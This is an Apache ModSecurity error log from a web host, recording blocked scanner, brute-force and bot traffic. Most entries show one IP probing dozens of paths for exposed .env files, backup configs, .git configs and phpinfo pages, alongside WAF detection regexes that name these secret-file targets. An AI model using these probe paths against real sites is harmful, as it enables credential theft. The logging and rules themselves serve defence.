[Tue May 26 14:16:47.875705 2026] [security2:error] [pid 598542:tid 598635] [remote 216.73.216.240:8509] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/jtc-about.php"] [unique_id "ahVd9_4iWyZxnXeAW3JSMgAAOVw"]
[Tue May 26 14:16:50.014020 2026] [security2:error] [pid 598542:tid 598771] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd-f4iWyZxnXeAW3JSYwAAAGM"]
[Tue May 26 14:16:50.303289 2026] [security2:error] [pid 598542:tid 598737] [client 20.151.111.128:4150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVd-v4iWyZxnXeAW3JSfwAAAEE"]
[Tue May 26 14:16:50.578362 2026] [security2:error] [pid 598542:tid 598687] [client 20.151.111.128:4131] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/wp-plain.php"] [unique_id "ahVd-v4iWyZxnXeAW3JSgwAAAA8"], referer: www.google.com
[Tue May 26 14:16:51.757781 2026] [security2:error] [pid 598542:tid 598682] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd-_4iWyZxnXeAW3JSmAAAAAo"]
[Tue May 26 14:16:52.895840 2026] [security2:error] [pid 598542:tid 598762] [client 185.10.4.253:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVd-_4iWyZxnXeAW3JSlQAAAFo"]
[Tue May 26 14:16:53.487076 2026] [security2:error] [pid 598542:tid 598753] [client 202.141.30.10:35515] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd_f4iWyZxnXeAW3JS0wAAAFE"]
[Tue May 26 14:16:53.487194 2026] [security2:error] [pid 598542:tid 598753] [client 202.141.30.10:35515] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVd_f4iWyZxnXeAW3JS0wAAAFE"]
[Tue May 26 14:16:53.835261 2026] [security2:error] [pid 598542:tid 598744] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVd_f4iWyZxnXeAW3JSzgAAAEg"]
[Tue May 26 14:16:54.082138 2026] [security2:error] [pid 598542:tid 598776] [client 20.151.111.128:4474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVd_v4iWyZxnXeAW3JS5QAAAGg"]
[Tue May 26 14:16:54.656997 2026] [security2:error] [pid 598542:tid 598778] [client 20.151.111.128:13331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.111.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rehobothindependentcare.com"] [uri "/edzbwdla.php"] [unique_id "ahVd_v4iWyZxnXeAW3JS9gAAAGo"], referer: www.google.com
[Tue May 26 14:16:54.781420 2026] [security2:error] [pid 598542:tid 598645] [remote 34.88.138.128:11776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.138.88.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahVd_v4iWyZxnXeAW3JS8wAAHmY"]
[Tue May 26 14:16:55.313921 2026] [security2:error] [pid 598542:tid 598559] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTBQAANxA"]
[Tue May 26 14:16:55.314361 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTCQAANw4"]
[Tue May 26 14:16:55.504230 2026] [security2:error] [pid 598542:tid 598585] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.dimcorp.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVd__4iWyZxnXeAW3JTGQAANyo"]
[Tue May 26 14:16:55.506369 2026] [security2:error] [pid 598542:tid 598663] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTHwAAN3g"]
[Tue May 26 14:16:55.507855 2026] [security2:error] [pid 598542:tid 598567] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTIAAANxg"]
[Tue May 26 14:16:55.614609 2026] [autoindex:error] [pid 598542:tid 598677] [client 43.157.52.37:54038] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:16:55.654191 2026] [security2:error] [pid 598542:tid 598578] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env"] [unique_id "ahVd__4iWyZxnXeAW3JTIwAANyM"]
[Tue May 26 14:16:55.658485 2026] [security2:error] [pid 598542:tid 598583] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVd__4iWyZxnXeAW3JTKAAANyg"]
[Tue May 26 14:16:55.659726 2026] [security2:error] [pid 598542:tid 598555] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVd__4iWyZxnXeAW3JTKQAANww"]
[Tue May 26 14:16:56.237407 2026] [security2:error] [pid 598542:tid 598785] [client 185.191.171.12:31816] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVeAP4iWyZxnXeAW3JTRAAAAHE"]
[Tue May 26 14:16:56.237567 2026] [security2:error] [pid 598542:tid 598785] [client 185.191.171.12:31816] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/page/3/"] [unique_id "ahVeAP4iWyZxnXeAW3JTRAAAAHE"]
[Tue May 26 14:16:56.281509 2026] [security2:error] [pid 598542:tid 598607] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVeAP4iWyZxnXeAW3JTTAAAYUA"]
[Tue May 26 14:16:56.336062 2026] [security2:error] [pid 598542:tid 598605] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVeAP4iWyZxnXeAW3JTSgAAYT4"]
[Tue May 26 14:16:56.436604 2026] [security2:error] [pid 598542:tid 598639] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env~"] [unique_id "ahVeAP4iWyZxnXeAW3JTXwAADGA"]
[Tue May 26 14:16:56.471200 2026] [security2:error] [pid 598542:tid 598624] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVeAP4iWyZxnXeAW3JTaQAAGlE"]
[Tue May 26 14:16:56.590045 2026] [security2:error] [pid 598542:tid 598627] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVeAP4iWyZxnXeAW3JTbwAASFQ"]
[Tue May 26 14:16:56.590663 2026] [security2:error] [pid 598542:tid 598622] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVeAP4iWyZxnXeAW3JTcAAASE8"]
[Tue May 26 14:16:56.598337 2026] [security2:error] [pid 598542:tid 598630] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVeAP4iWyZxnXeAW3JTcgAAd1c"]
[Tue May 26 14:16:56.788417 2026] [security2:error] [pid 598542:tid 598792] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeAP4iWyZxnXeAW3JTVQAAAHg"]
[Tue May 26 14:16:57.124904 2026] [autoindex:error] [pid 598542:tid 598650] [remote 45.148.10.95:10086] AH01276: Cannot serve directory /home2/jhonwy9v/dimensioncorporativa.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:16:57.148235 2026] [security2:error] [pid 598542:tid 598645] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTrwAALGY"]
[Tue May 26 14:16:57.170584 2026] [security2:error] [pid 598542:tid 598562] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTsQAAZBM"]
[Tue May 26 14:16:57.202891 2026] [security2:error] [pid 598542:tid 598557] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVeAf4iWyZxnXeAW3JTtwAABg4"]
[Tue May 26 14:16:57.308755 2026] [security2:error] [pid 598542:tid 598663] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwAAAYHg"]
[Tue May 26 14:16:57.314325 2026] [security2:error] [pid 598542:tid 598567] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwgAAYBg"]
[Tue May 26 14:16:57.315091 2026] [security2:error] [pid 598542:tid 598577] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTwwAAYCI"]
[Tue May 26 14:16:57.318940 2026] [security2:error] [pid 598542:tid 598572] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxAAAYB0"]
[Tue May 26 14:16:57.319249 2026] [security2:error] [pid 598542:tid 598585] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxQAAYCo"]
[Tue May 26 14:16:57.335342 2026] [security2:error] [pid 598542:tid 598670] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTyAAAHn8"]
[Tue May 26 14:16:57.335483 2026] [security2:error] [pid 598542:tid 598570] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JTxwAAHhs"]
[Tue May 26 14:16:57.659918 2026] [security2:error] [pid 598542:tid 598602] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JT7QAALTs"]
[Tue May 26 14:16:57.726709 2026] [security2:error] [pid 598542:tid 598605] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin-app/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JT9QAAFj4"]
[Tue May 26 14:16:57.843965 2026] [security2:error] [pid 598542:tid 598621] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JUAgAABE4"]
[Tue May 26 14:16:57.854932 2026] [security2:error] [pid 598542:tid 598666] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.dimcorp.jhonweb.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVeAf4iWyZxnXeAW3JUBQAAI3s"]
[Tue May 26 14:16:57.890473 2026] [security2:error] [pid 598542:tid 598667] [remote 45.148.10.95:10086] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.dimcorp.jhonweb.com"] [uri "/api-backend/.env"] [unique_id "ahVeAf4iWyZxnXeAW3JUCAAAP3w"]
